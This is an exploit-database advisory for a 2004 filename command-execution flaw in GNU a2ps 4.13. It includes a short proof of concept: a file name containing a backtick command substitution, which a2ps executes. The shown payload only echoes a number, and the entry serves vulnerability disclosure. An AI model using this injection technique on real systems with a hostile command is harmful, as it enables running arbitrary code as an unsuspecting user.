Lucene search

K
exploitdbRudolf PolzerEDB-ID:24406
HistoryAug 24, 2004 - 12:00 a.m.

GNU a2ps 4.13 - File Name Command Execution

2004-08-2400:00:00
Rudolf Polzer
www.exploit-db.com
14

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/11025/info

Reportedly GNU a2ps is affected by a filename command-execution vulnerability. This issue is due to the application's failure to properly sanitize filenames.

An attacker might leverage this issue to execute arbitrary shell commands with the privileges of an unsuspecting user running the vulnerable application.

Although this issue reportedly affects only a2ps version 4.13, other versions are likely affected as well. 

$ touch 'x`echo >&2 42`.c'
$ a2ps -o /dev/null *.c
42
[x`echo >&2 42`.c (C): 0 pages on 0 sheets]
[Total: 0 pages on 0 sheets] saved into the file `/dev/null'